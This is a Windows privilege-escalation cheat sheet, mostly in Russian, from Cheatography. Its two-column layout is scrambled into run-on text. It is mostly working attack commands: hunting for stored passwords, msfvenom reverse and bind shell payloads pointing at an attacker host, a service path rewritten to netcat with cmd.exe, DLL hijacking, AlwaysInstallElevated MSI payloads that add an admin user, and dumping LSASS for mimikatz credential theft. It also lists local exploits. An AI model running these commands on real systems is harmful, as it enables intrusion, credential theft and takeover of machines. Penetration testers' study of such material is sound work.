Windows Privilege Escalation v0.1 Cheat Sheet by Adisf via cheatography.com/37294/cs/12009/

Clear-text passwords Уязвимости по патчам

Содержимое файлов, в которых хранятся пароли для MS07-022 - KB931784 автораз​ вер​ тыв​ ания MS07-066 - KB943078 C:\un​ att​ end​ .xml MS08-064 - KB956841 %WIND​ IR%​ \Pa​ nth​ er\​ Una​ tte​ nd\​ Una​ tte​ nde​ d.xm​ l MS09-058 - KB971486 %WIND​ IR%​ \Pa​ nth​ er\​ Una​ tte​ nde​ d.xm​ l MS10-015 - KB977165 C:\sy​ spr​ ep.inf - [Clear Text] MS10-021 - KB979683 MS10-059 - KB982799 C:\sy​ spr​ ep\​ ​ pre​ p.xm​ l - [Base64] MS10-092 - KB2305420 Файлы, которые также могут содержать пароли в зашифро​ ванном MS11-011 - KB2393802 виде в атрибуте cpassword MS11-080 - KB2592799 group​ .xml MS13-005 - KB2778930 Servi​ ces​ \Se​ rvi​ ces​ .xml CVE-201​ 3-3660 Sched​ ule​ dTa​ sks​ \Sc​ hed​ ule​ dTa​ sks​ .xml MS12-078 - KB2783534 Print​ ers​ \Pr​ int​ ers​ .xml MS13-053 - KB2778930 ​ ​ ​ Drives\Drives.xml MS13-081 - KB2870008 DataS​ our​ ces​ \Da​ taS​ our​ ces​ .xml MS14-058 - KB3000061 Поиск различных файлов по маске MS14-068 - KB3011780 C:\> /s *pass* == *cred* == *vnc* == *.conf​ ig* MS14-070 - KB2989935 Поиск password в текстовых файлах MS15-001 - KB3023266 C:\> findstr /si password *.txt | *.xml | *.ini MS15-051 - KB3057191 C:\> findstr /si pass *.txt | *.xml | *.ini MS15-052 - KB3050514 Поиск password в реестре KiTrap0D - KB979682 C:\> reg query HKLM /s | findstr /i password > temp.txt C:\> reg query HKCU /s | findstr /i password > temp.txt Using accessc​ hk.exe C:\> reg query HKLM /f password /t REG_SZ /s Автомат​ ически принять пользов​ ате​ льское соглашение C:\> reg query HKCU /f password /t REG_SZ /s C:\> acces​ sch​ k.exe /accept​ eula Пароль автологина Поиск директорий с правами на запись C:\> reg query "H​ KLM​ \So​ ftw​ are​ \Mi​ cro​ sof​ t\​ Windows C:\> acces​ sch​ k.exe -uwdqs Пользов​ атели C:\ NT\Curr​ ent​ ​ sio​ n\​ Winl​ ogo​ n" C:\> acces​ sch​ k.exe -uwdqs "A​ uth​ ent​ icated Users" C:\ Поиск файлов с правами на запись PSexec C:\> acces​ sch​ k.exe -uwqs Пользов​ атели c:\*.*

В Linux'е C:\> acces​ sch​ k.exe -uwqs "A​ uth​ ent​ icated Users" c:\*.* $ psexe​ c.py @​ C:\> "c​ :\​ Program Files" /T | findstr Пользов​ ате​ ли Из пакета SysInte​ rnals Права на конкретный сервис C:\> psexe​ c.exe \\ C:\> acces​ sch​ k.exe -ucqv [servic​ e_n​ ame] Слабые права на сервисы C:\> acces​ sch​ k.exe -uwcqv * Создание bind-шелла Права группы на запись у сервисов $ msfvenom -p windows​ /sh​ ell​ _bi​ nd_tcp -f exe -o C:\> acces​ sch​ k.exe -uwcqv "A​ uth​ ent​ icated Users" * LPORT=<​ Bin​ dPo​ rt>​ $ msfvenom -p windows​ /sh​ ell​ _bi​ nd_tcp -f dll -o LPORT=<​ Bin​ dPo​ rt>​

By Adisf Not published yet. Sponsored by Readability-Score.com cheatography.com/adisf/ Last updated 9th June, 2017. Measure your website readability! Page 1 of 6. https://readability-score.com Windows Privilege Escalation v0.1 Cheat Sheet by Adisf via cheatography.com/37294/cs/12009/

WMIC (Win 7/8 -- XP requires admin) Vulnerable EXE Permiss​ ions

Установ​ ленные патчи Если есть доступ на запись к исполня​ емым файлам, то можно C:\> wmic qfe get Caption​ ,De​ scr​ ipt​ ion​ ,Ho​ tFi​ xID​ ,In​ sta​ lle​ dOn подсунуть свой файл и при запуске админис​ тра​ тором этого файла Поиск из установ​ ленных патчей нужного получим шелл. Можно объединить исполня​ емый файл с нагрузкой с C:\> wmic qfe get Caption​ ,De​ scr​ ipt​ ion​ ,Ho​ tFi​ xID​ ,In​ sta​ lledOn | findstr помощью метаспл​ оита. /C:"K​ B.." /C:"K​ B.." msf> msfvenom -a x86 --platform windows -x putty.exe -k -p windows​ /me​ ter​ pre​ ter​ /re​ ver​ se_tcp lhost=1​ 92.168​ .1.101 -e

Эксплоиты exploitdb x86/shi​ kat​ a_g​ a_nai -i 3 -b "\​ x00​ " -f exe -o puttyX.exe

350,pla​ tfo​ rms​ /wi​ ndo​ ws/​ loc​ al/​ 350​ .c,​ "MS Utility Manager PowerSp​ loit Privilege Elevation Exploit (MS04-0​ 19)​ ",20​ 04-​ 07-​ 14,​ "Cesar Cerrudo​ ",wi​ ndo​ ws,​ loc​ al,0 https:/​ /gi​ thu​ b.co​ m/​ Pow​ erS​ hel​ lMa​ fia​ /Po​ wer​ Sploit 351,pla​ tfo​ rms​ /wi​ ndo​ ws/​ loc​ al/​ 351​ .c,​ "MS Windows 2K POSIX Subsystem А точнее скрипт Privilege Escalation Exploit (MS04-0​ 20)​ ",20​ 04-​ 07-​ https:/​ /gi​ thu​ b.co​ m/​ Pow​ erS​ hel​ lMa​ fia​ /Po​ wer​ Spl​ oit​ /tr​ ee/​ mas​ ter​ /Pr​ ivesc 17,​ bkb​ ll,​ win​ dow​ s,l​ ocal,0 Get-S​ erv​ ice​ Unq​ uot​ ed найдет все сервисы без кавычек и с 1198,pl​ atf​ orm​ s/w​ ind​ ows​ /lo​ cal​ /11​ 98.c,"​ MS Windows CSRSS Local пробелами в полном путе Privilege Escalation Exploit (MS05-0​ 18)​ ",20​ 05-​ 09-​ Get-S​ erv​ ice​ Per​ ms перечислит все сервисы, на модифик​ ацию 06,​ eya​ s,w​ ind​ ows​ ,lo​ cal,0 которых имеет право текущий пользов​ атель 1407,pl​ atf​ orm​ s/w​ ind​ ows​ /lo​ cal​ /14​ 07.c,"​ MS Windows 2k Kernel APC Data- Get-S​ erv​ ice​ EXE​ Per​ ms проверит все исполня​ емые файлы сервисов Free Local Escalation Exploit (MS05-0​ 55)​ ",20​ 06-​ 01-​ и вернет файлы, на которые пользов​ атель имеет право на запись 05,​ SoB​ eIt​ ,wi​ ndo​ ws,​ loc​ al,0 Invok​ e-S​ erv​ ice​ Use​ rAdd включае​ т/о​ ста​ нав​ ливает сервис, 1911,pl​ atf​ orm​ s/w​ ind​ ows​ /lo​ cal​ /19​ 11.c,"​ MS Windows XP/2K (Mrxsmb​ .sys) реконфи​ гур​ ирует его, добавляя с его помощью локального Privilege Escalation PoC (MS06-0​ 30)​ ",20​ 06-​ 06-​ 14,​ "Ruben Santamarta пользов​ ателя и добавляя его в группу админис​ тра​ торов, рестартует ",​ win​ dow​ s,l​ ocal,0 и т.д. 2412,pl​ atf​ orm​ s/w​ ind​ ows​ /lo​ cal​ /24​ 12.c,"​ MS Windows (Windows Kernel) Write​ -Us​ erA​ ddS​ erv​ ice​ Bin​ ary создает скомпил​ иро​ ванный C# Privilege Escalation Exploit (MS06-0​ 49)​ ",20​ 06-​ 09-​ бинарник и бинарный патч, добавля​ ющий пользов​ ателя. 21,​ SoB​ eIt​ ,wi​ ndo​ ws,​ loc​ al,0 Write​ -Se​ rvi​ ceE​ XE записывает бинарник в указанный путь сервиса и 3688,pl​ atf​ orm​ s/w​ ind​ ows​ /lo​ cal​ /36​ 88.c,"​ MS Windows GDI Local Privilege возвращает оригина​ льные .exe Escalation Exploit (MS07-0​ 17)​ ",20​ 07-​ 04-​ 08,​ Iva​ nle​ f0u​ ,wi​ ndo​ ws,​ loc​ al,0 Invok​ e-F​ ind​ DLL​ Hij​ ack является портиро​ ванной версией Mandiant’s 3755,pl​ atf​ orm​ s/w​ ind​ ows​ /lo​ cal​ /37​ 55.c,"​ MS Windows GDI Local Privilege FindDLL​ Hij​ ack. Проверяет все запущенные процессы и их Escalation Exploit (MS07-017) 2",20​ 07-​ 04-​ 17,​ "Lionel загруже​ нные модули и возвращает все hijacka​ ble​ -пути, т.е. путь к exe d'Hauen​ ens​ ",wi​ ndo​ ws,​ loc​ al,0 и модуль, которых не существ​ ует. 3804,pl​ atf​ orm​ s/w​ ind​ ows​ /re​ mot​ e/3​ 804​ .tx​ t,"​ MS Windows (.ANI) GDI Invok​ e-F​ ind​ Pat​ hDL​ LHi​ jack ищет потенци​ ально hijackable службы. Remote Elevation of Privilege Exploit (MS07-0​ 17)​ ",20​ 07-​ 04-​ 26,​ "Lionel DLL пути из %PATH%. Подробнее d'Hauen​ ens​ ",wi​ ndo​ ws,​ rem​ ote,0 http://​ www​ .gr​ eyh​ ath​ ack​ er.net​ /?p​ =738 5518,pl​ atf​ orm​ s/w​ ind​ ows​ /lo​ cal​ /55​ 18.txt​ ,"MS Windows XP SP2 Get-R​ egA​ lwa​ ysI​ nst​ all​ Ele​ vat​ ed проверяет включен ли ключ реестра (win32k​ .sys) Privilege Escalation Exploit (MS08-0​ 25)​ ",20​ 08-​ 04-​ ​ ​ ​ ​ 28,​ "Ruben Santamarta ",​ win​ dow​ s,l​ ocal,0 AlwaysInstallElevated ​ ​ ​ ​ 14611,p​ lat​ for​ ms/​ win​ dow​ s/d​ os/​ 146​ 11.c,"​ M​ icr​ osoft Windows Write-UserAddMSI может затем создать MSI, который добавит 'SfnLOG​ ONN​ OTIFY' Local Privilege Escalation Vulnera​ bility пользов​ ателя с админскими правами (MS10-0​ 48)​ ",20​ 10-​ 08-​ 10,​ MJ0​ 011​ ,wi​ ndo​ ws,​ dos,0 Get-U​ nat​ ten​ ded​ Ins​ tal​ lFi​ les поиск файлов автомат​ иче​ ской 18176,p​ lat​ for​ ms/​ win​ dow​ s/l​ oca​ l/1​ 817​ 6.py​ ,"​ W​ indows Afd.sys - Privilege установки .xml, которые могут содержать какие-либо учетные Escalation Exploit (MS11-0​ 80)​ ",20​ 11-​ 11-​ 30,​ ryu​ jin​ ,wi​ ndo​ ws,​ loc​ al,0 данные 21844,p​ lat​ for​ ms/​ win​ dow​ s/l​ oca​ l/2​ 184​ 4.rb​ ,"​ M​ S11​ -080 AfdJoin​ Leaf Privilege Get-R​ egA​ uto​ Log​ on извлекает данные автологина из реестра Escalat​ ion​ ",20​ 12-​ 10-​ 10,​ met​ asp​ loi​ t,w​ ind​ ows​ ,lo​ cal,0 27296,p​ lat​ for​ ms/​ win​ dow​ s/l​ oca​ l/2​ 729​ 6.rb​ ,"​ M​ S13​ -005 HWND_BR​ OAD​ CAST Low to Medium Integrity Privilege Escalat​ ion​ ",20​ 13-​ 08-​ 02,​ met​ asp​ loi​ t,w​ ind​ ows​ ,lo​ cal,0

By Adisf Not published yet. Sponsored by Readability-Score.com cheatography.com/adisf/ Last updated 9th June, 2017. Measure your website readability! Page 2 of 6. https://readability-score.com Windows Privilege Escalation v0.1 Cheat Sheet by Adisf via cheatography.com/37294/cs/12009/

PowerSp​ loit (cont) DLL Hijacking (cont)

Invok​ e-A​ llC​ hec​ ks запустит все проверки на повышение привилегий Проанал​ изи​ ровать можно с помощью ProcMon с установ​ лен​ ными фильтрами

Insecure Registry Permiss​ ions Process​ Name is Vulnera​ ble​ .exe Result is NAME NOT FOUND Ошибки в правах на ветки реестра тоже могут помочь повысить Path ends with .dll привиле​ гии, для проверки использ​ уется программа SubInACL Теперь нужно найти папку с правами на запись. Часто в корне диска C:\> subin​ acl​ .exe /keyreg C: установ​ лены программы, к которым имеют доступ "H​ KEY​ _LO​ CAL​ _MA​ CHI​ NE\​ SYS​ TEM​ \Cu​ rre​ ntC​ ont​ rol​ Set​ \Se​ rvi​ ces​ \Vu​ lne​ аутенти​ фиц​ иро​ ванные пользов​ атели (python27) rable Service​ " /display Проверим права Если можем изменять ключ реестра, то выполним C:\> acces​ sch​ k.exe -dqv "C​ :\​ Pyth​ on2​ 7" C:\> reg add C:\> icacls C:\Pyth​ on27 "H​ KEY​ _LO​ CAL​ _MA​ CHI​ NE\​ SYS​ TEM​ \Co​ ntr​ olS​ et0​ 01\​ Ser​ vic​ es\​ Vul​ ner​ able Аутенти​ фиц​ иро​ ванные пользов​ атели имеют права на модифик​ ацию Service​ " /t REG_EXP​ AND_SZ /v ImagePath /d Создадим простой реверс-​ шелл "C​ :\​ User​ s\​ test​ use​ r\​ AppD​ ata​ \Lo​ cal​ \Te​ mp\​ Pay​ loa​ d.ex​ e"​ /f root@ka​ li~# msfvenom -p windows​ /x6​ 4/m​ ete​ rpr​ ete​ r/r​ eve​ rse​ _tcp lhost=1​ 92.168​ .2.60 lport=8989 -f dll > hijacka​ ble​ .dll

DLL Hijacking Загрузим meterpr​ ete​ r> upload -f hijacka​ ble​ .dll Статья, которая хорошо описывает данную уязвимость Скопируем наш DLL в папку с python27 *When an applica​ tion dynamic​ ally loads a dynamic​ -link library without C:\> hijacka​ ble​ .dll C:\Pyth​ on2​ 7\​ wlbs​ ctr​ l.dl​ l specifying a fully qualified path name, Windows attempts to locate the DLL Процесс IKEEXT (“IKE and AuthIP IPsec Keying Modules”) пытается by searching a well-de​ fined set of directo​ ries in a particular order, as загрузить wlbsctr​ l.dll, который отсутст​ вует в конфигу​ рации системы described in Dynamic​ -Link Library Search Order. If an attacker gains по-умол​ чанию (Vista, 2008, 7, 8), а так как папка C:\pyth​ on27 имеется control of one of the directo​ ries on the DLL search path, it can place a в PATH, то эта библиотека будет подгружена при запуске этого malicious copy of the DLL in that directory. This is sometimes called a DLL сервиса (после перезаг​ рузки системы) preloading attack or a binary planting attack. If the system does not a C:\> sc qc IKEEXT legitimate copy of the DLL before it searches the comprom​ ised directory, it loads the malicious DLL. If the applica​ tion is running with adminis​ trator privile​ ges, the attacker may succeed in local privilege elevati​ on.*. Ссылки Порядок проверки следующий https:/​ /pe​ nte​ st.blo​ g/w​ ind​ ows​ -pr​ ivi​ leg​ e-e​ sca​ lat​ ion​ -me​ tho​ ds-​ for​ -pe​ nte​ sters/ 1) Директо​ рия, из которой запущено приложе​ ние. https:/​ /xa​ kep​ .ru​ /20​ 14/​ 12/​ 24/​ hac​ k-a​ dmi​ n-r​ ules/ 2) Системная директория для 32-битных приложений http://​ www​ .fu​ zzy​ sec​ uri​ ty.com​ /tu​ tor​ ial​ s/1​ 6.html (C:\Win​ dow​ s\​ Syst​ em32). http://​ www​ .fu​ zzy​ sec​ uri​ ty.com​ /tu​ tor​ ial​ s/1​ 8.html 3) Системная директория для 16-битных приложений http://​ www​ .gr​ eyh​ ath​ ack​ er.net​ /?p​ =738 (C:\Win​ dow​ s\​ Syst​ em). 4) Папка C:\Wind​ ows. Metasploit 5) Текущая папка. 6) Директо​ рии, указанные в переменной окружения PATH. Можно оставить в системе свой сертификат чтобы при перехватах Для эксплуа​ тации нам надо найти директорию откуда загружа​ ется трафика или при запуске некоторых приложений с проверкой DLL и подсунуть свою уровнем выше. издателя не выходило предупр​ ежд​ ений Так как мы не можем видеть какие библиотеки подгруж​ аются, post/wi​ ndo​ ws/​ man​ age​ /in​ jec​ t_ca скачиваем себе исполня​ емый файл и анализи​ руем его. Нас интересует LoadLib​ raryW

By Adisf Not published yet. Sponsored by Readability-Score.com cheatography.com/adisf/ Last updated 9th June, 2017. Measure your website readability! Page 3 of 6. https://readability-score.com Windows Privilege Escalation v0.1 Cheat Sheet by Adisf via cheatography.com/37294/cs/12009/

Сбор информации Управление сервисами

Информация о системе Создание и запуск сервиса C:\> syste​ min​ fo C:\> sc create binpath= Текущий пользов​ атель "c​ :\​ wind​ ows​ \sy​ ste​ m32​ \cm​ d.exe /k "​ C:\> %userna​ me% Display​ Name= ​ C:\> C:\> sc ​ Список пользов​ ателей Вывод списка всех служб, настрое​ нных на компьютере C:\> net users C:\> sc query C:\> net user Настройка учетных записей регистр​ ации и запуска служб Информация о пользов​ ателе C:\> sc config C:\> net user "%​ use​ rna​ me%​ " Отображ​ ение конфигу​ рации определ​ енной службы Список групп C:\> sc qc [servic​ e_n​ ame] C:\> net localgr​ oup Задачи по расписанию Версия ОС C:\> schtasks /query /fo LIST /v C:\> ver Запущенные процессы в запущенных службах Установ​ ленные драйвера C:\> /SVC C:\> DRIVE​ RQU​ ERY C:\> net start

Информация о сети Эксплоиты в Metasploit

Сетевые адаптеры exploit​ /wi​ ndo​ ws/​ loc​ al/​ alw​ ays​ _in​ sta​ ll_​ ele​ vated - excellent Windows C:\> /all AlwaysI​ nst​ all​ Ele​ vated MSI

Маршруты exploit​ /wi​ ndo​ ws/​ loc​ al/​ byp​ ass​ uac​ _in​ jec​ tion - excellent Windows Escalate C:\> UAC Protection Bypass (In Memory Injection) ARP-таб​ лица exploit​ /wi​ ndo​ ws/​ loc​ al/​ ms1​ 0_0​ 15_​ kit​ rap0d - great Windows SYSTEM C:\> arp -A Escalation via KiTrap0D Сетевые соединения с PID exploit​ /wi​ ndo​ ws/​ loc​ al/​ ms1​ 0_0​ 92_​ sch​ ele​ vator - excellent Windows C:\> -ano Escalate Task Scheduler XML Privilege Escalation Сетевые соединения с именем процесса exploit​ /wi​ ndo​ ws/​ loc​ al/​ ms1​ 1_0​ 80_​ afd​ joi​ nleaf - average MS11-080 C:\> netstat -anb - Требует повышения AfdJoin​ Leaf Privilege Escalation exploit​ /wi​ ndo​ ws/​ loc​ al/​ ms1​ 3_0​ 05_​ hwn​ d_b​ roa​ dcast - excellent MS13-005 Фаервол (только Win XP SP2+) HWND_BR​ OAD​ CAST Low to Medium Integrity Privilege Escalation C:\> firewall show state exploit​ /wi​ ndo​ ws/​ loc​ al/​ ms1​ 3_0​ 53_​ sch​ lam​ perei - average Windows C:\> netsh firewall show config NTUserM​ ess​ age​ Call Win32k Kernel Pool Overflow (Schlam​ perei) Пароль Wi-Fi exploit​ /wi​ ndo​ ws/​ loc​ al/​ ms1​ 3_0​ 81_​ tra​ ck_​ pop​ up_​ menu - average Windows C:\> netsh wlan export profile key=cle​ ar TrackPo​ pup​ MenuEx Win32k NULL Page exploit​ /wi​ ndo​ ws/​ loc​ al/​ ms1​ 3_0​ 97_​ ie_​ reg​ ist​ ry_​ sym​ link - great MS13-097 ​ ​ Кросскомпиляция Registry Symlink IE Sandbox Escape

Компиляция с помощью wine exploit​ /wi​ ndo​ ws/​ loc​ al/​ ms1​ 4_0​ 09_​ ie_​ dfsvc - great MS14-009 .NET $ cp /usr/sh​ are​ /ex​ plo​ itd​ b/p​ lat​ for​ ms/​ win​ dow​ s/l​ oca​ l/<​ exp​ loi​ t>.c /tmp/ Deployment Service IE Sandbox Escape exploit​ /wi​ ndo​ ws/​ loc​ al/​ ms_​ ndp​ roxy - average MS14-002 Microsoft $ /root/.win​ e/d​ riv​ e_c​ /Mi​ nGW​ /bin Windows ndproxy​ .sys Local Privilege Escalation $ wine gcc -o w00t.exe /tmp/.c -l lib exploit​ /wi​ ndo​ ws/​ loc​ al/​ ppr​ _fl​ att​ en_rec - average Windows EPATHOB​ J::​ ppr​ Fla​ tte​ nRec Local Privilege Escalation exploit​ /wi​ ndo​ ws/​ loc​ al/​ tru​ ste​ d_s​ erv​ ice​ _path - excellent Trusted Path Privilege Escalation

By Adisf Not published yet. Sponsored by Readability-Score.com cheatography.com/adisf/ Last updated 9th June, 2017. Measure your website readability! Page 4 of 6. https://readability-score.com Windows Privilege Escalation v0.1 Cheat Sheet by Adisf via cheatography.com/37294/cs/12009/

Эксплоиты в Metasploit (cont) Vulnerable Service Permission (cont) exploit​ /wi​ ndo​ ws/​ loc​ al/​ vir​ tua​ l_b​ ox_​ gue​ st_​ add​ itions - average VirtualBox Можно проверить с помощью accessc​ hk.exe и SC Guest Additions VBoxGue​ st.sys Privilege Escalation Пример (SSDPSRV в win xp sp0-1) post/wi​ ndo​ ws/​ esc​ alate - Also look these post exploit​ ation modules... sc config [servic​ e_n​ ame] binpath= "C​ :\​ nc.exe -nv [RHOST] [RPORT] - e C:\WIND​ OWS​ \Sy​ ste​ m32​ \cm​ d.ex​ e"​ Trusted Path Escalation sc config [servic​ e_n​ ame] obj= ".\Lo​ cal​ Sys​ tem​ " password= ""​ sc qc [servic​ e_n​ ame] (to verify!) Если путь указан без кавычек и содержит пробел, то этим можно net start [servic​ e_n​ ame] восполь​ зов​ аться. Модуль метаспл​ оита: ​ ​ ​ ​ ​ Например, путь C:\To​ ols​ \Cu​ stom Tools\​ prog​ ram​ .exe может service_permissions Некоторые известные уязвимые сервисы интерпр​ ети​ ров​ аться как C:\To​ ols​ \Cu​ sto​ m.ex​ e с параметром Windows XP with sp2 Tools​ \pr​ ogr​ am.exe * - As Power User: Имея права на запись в C:\To​ ols мы можем создать файл * service: DcomLaunch ( SYSTEM ) C:\To​ ols​ \Cu​ sto​ m.ex​ e, который и будет выполнен * Service: UpnpHost ( Local Service ) Модуль метаспл​ оита: trust​ ed_​ ser​ vic​ e_p​ ath * Service: SSDPSRV (Local Service) Поиск с помощью WMIC * Service: WMI (SYSTEM) <- sometimes as user also.. ​ ​ ​ ​ ​ ​ ​ ​ ​ C:\> wmic service get name,displayname,pathname,startmode * - As User: |findstr /i "A​ uto​ " | findstr /i /v "C​ :\​ Wind​ ows​ \\​ " |findstr /i /v ""​ "​ * Service: UpnpHost ( Local Service ) Порядок выполне​ ния, который проверяет система * Service: SSDPSRV (Local Service) C:\Prog​ ram​ .exe * - As Network Config Operators:

C:\Program Files.exe * service: DcomLaunch ( SYSTEM ) C:\Program Files (x86)\​ Prog​ ram​ .exe * Service: UpnpHost ( Local Service ) C:\Program Files (x86)\​ Program Folder\​ A.exe * Service: SSDPSRV (Local Service) C:\Program Files (x86)\​ Program Folder\A Subfold​ er\​ Exe​ cut​ abl​ e.exe * Service: DHCP ( SYSTEM ) Проверить права на папку * Service: NetBT (SYSTEM - .sys driver) C:\> icacls "C​ :\​ Program Files (x86)\​ Program Folder"​ * Service DnsCache (SYSTEM) Интерес​ ующие права Windows 2000 F = Full Control * - As Power user CI = Container Inherit – означает что все контейнеры наследуют этот * service: WMI (SYSTEM) флаг. Third Part software (local & remote code execution) OI = Object Inherit – все файлы наследуют этот флаг * Service: [Pml Driver HPZ12] (HP Software - При запуске сервиса он почти сразу умирает, так как при запуске он C:\WINN​ T\​ syst​ em3​ 2\​ spoo​ l\​ DRIV​ ERS​ \W3​ 2X8​ 6\​ 3\HP​ Zip​ m12​ .exe) должен общаться с Service Control Manager, а так как SCM не * -Granted Full Control to Everyone Group. получает даных, то считает что что-то не так и убивает процесс, * Service: [Autodesk Licensing Service] (Autocad - C:\program поэтому надо как только получили сессию мигриро​ вать meterpr​ eter на files\​ Common files\​ Auto​ desk Shared\​ Ser​ vic​ e\​ Adsk​ ScS​ rv.exe) другой процесс. * -Maybe related to: http://​ www​ .se​ cur​ ity​ foc​ us.com​ /bi​ d/1​ 6472 * -Autodesk Multiple Products Remote Unautho​ rized Access Vulnera​ bility Vulnerable Service Permission

Проверяем имеет ли текущий пользов​ атель права на редакти​ ров​ ание сервиса. Редакти​ руем путь к исполня​ емому файлу сервиса на команду добавления пользов​ ателя или на свой шелл.

By Adisf Not published yet. Sponsored by Readability-Score.com cheatography.com/adisf/ Last updated 9th June, 2017. Measure your website readability! Page 5 of 6. https://readability-score.com Windows Privilege Escalation v0.1 Cheat Sheet by Adisf via cheatography.com/37294/cs/12009/

AlwaysI​ nst​ all​ Ele​ vated Removed autorun programms (cont)

Нас интересуют ключи Этой ситуацией также можно восполь​ зов​ аться для расширения [HKEY_C​ URR​ ENT​ _US​ ER\​ SOF​ TWA​ RE\​ Pol​ ici​ es\​ Mic​ ros​ oft​ \Wi​ ndo​ ws\​ Ins​ tal​ le своих полномочий. Первым делом надо найти все такие r] осироте​ вшие записи. Например, при помощи утилиты autorunsc от “Always​ Ins​ tal​ lEl​ eva​ ted​ ”=d​ wor​ d:0​ 000​ 0001 Sysinte​ rnals.. C:\> autor​ uns​ c.exe -a | findstr /n /R "F​ ile\ not\ found" [HKEY_L​ OCA​ L_M​ ACH​ INE​ \SO​ FTW​ ARE​ \Po​ lic​ ies​ \Mi​ cro​ sof​ t\​ Wind​ ows​ \In​ sta​ lle r] Mimikatz и procdump “Always​ Ins​ tal​ lEl​ eva​ ted​ ”=d​ wor​ d:0​ 000​ 0001 которые позволяют любому установить msi с повышен​ ными Сначала получим дамп процесса LSASS. Можно это сделать с привиле​ гиями помощью mimikatz, но с ProcDump можно не беспоко​ иться о C:\> reg query предупр​ ежд​ ениях антивир​ усов C:\> procd​ ump​ .exe -accept​ eula -ma lsass.exe lsass.dm​ p HKCU\SO​ FTW​ ARE​ \Po​ lic​ ies​ \Mi​ cro​ sof​ t\​ Wind​ ows​ \In​ sta​ ller /v После получения дампа можно скормить его mimikatz и получить AlwaysI​ nst​ all​ Ele​ vat​ ed пароли C:\> reg query C:\Mimi​ kat​ z\​ x32> mimik​ atz​ .exe HKLM\SO​ FTW​ ARE​ \Po​ lic​ ies​ \Mi​ cro​ sof​ t\​ Wind​ ows​ \In​ sta​ ller /v mimikatz# sekur​ lsa​ ::m​ ini​ dump C:\User​ s\​ Fuba​ r\​ Desk​ top​ \ls​ ass​ .dmp AlwaysI​ nst​ all​ Ele​ vat​ ed mimikatz# sekur​ lsa​ ::t​ spkg Если выйдет ошибка, то политика отключена, но если установлен Таким образом можно получить пароли пользов​ ате​ лей, которые параметр, то мы можем это использ​ овать недавно авториз​ овы​ вались root@ka​ li:~# msfvenom -f msi-nouac -p windows​ /ad​ duser Некоторые возможн​ ости mimikatz USER=ev​ ila​ dmin PASS=P4​ ssw​ 0rd@ -o add_use​ r.ms​ i wdigest (пароли AD) Или без добавления пользов​ ателя kerberos (хэши LM/NTLM) root@ka​ li:~# msfvenom -p windows​ /me​ ter​ pre​ ter​ /re​ ver​ se_tcp -e oss (пароли Outlook) x86/shi​ kat​ a_g​ a_nai LHOST=1​ 92.168​ .2.60 LPORT=8989 -f exe -o livessp (windows 8 пароль) ​ Payload.exe msv ( AD) пароль root@ka​ li:~# msfvenom -f msi-nouac -p windows​ /exec tspkg (пароль AD) cmd="C:\​ Use​ rs\​ tes​ tus​ er\​ App​ Dat​ a\​ Loca​ l\​ Temp​ \Pa​ ylo​ ad.exe​ " > malicio​ us.msi PowerShell

AD DNS-zone transfer Privilege Escalation with Task Scheduler PS C:\> Get-Wmi​ Object -Comput​ erName dc1 -Namespace Работает только на Windows 2000, XP, или 2003. В этих системах root\mi​ cro​ sof​ tDNS -Class Microso​ ftD​ NS_​ Res​ our​ ceR​ ecord -Filter задачи по расписанию выполня​ ются с системными правами. "d​ oma​ inn​ ame​ =ur​ iit​ .lo​ cal​ " | select textrep​ res​ ent​ ation root@ka​ li:~# msfvenom -p windows​ /me​ ter​ pre​ ter​ /re​ ver​ se_tcp -e x86/shi​ kat​ a_g​ a_nai LHOST=1​ 92.168​ .2.60 LPORT=8989 -f exe -o Payload​ .exe C:\> net start "Task Schedul​ er"​ C:\> at 06:42 /intera​ ctive "C​ :\​ Docu​ ments and Setting​ s\​ test​ \Local Setting​ s\​ Temp​ \Pa​ ylo​ ad.exe​ " Утилита schtasks позволяет вешать задачи на определ​ енные события. Наиболее интересные для нас — ONIDLE, ONLOGON и ONSTART

Removed autorun programms

Очень часто случается, что система хранит запись о файле, который надо автомат​ ически запустить, даже после того, как сам файл уже канул в Лету. Может, какой-то сервис был некорре​ ктно удален — исполня​ емого файла нет, а запись в реестре осталась, и при каждом запуске система безуспешно пытается его стартан​ уть, забивая журнал событий сообщен​ иями о фейлах.

By Adisf Not published yet. Sponsored by Readability-Score.com cheatography.com/adisf/ Last updated 9th June, 2017. Measure your website readability! Page 6 of 6. https://readability-score.com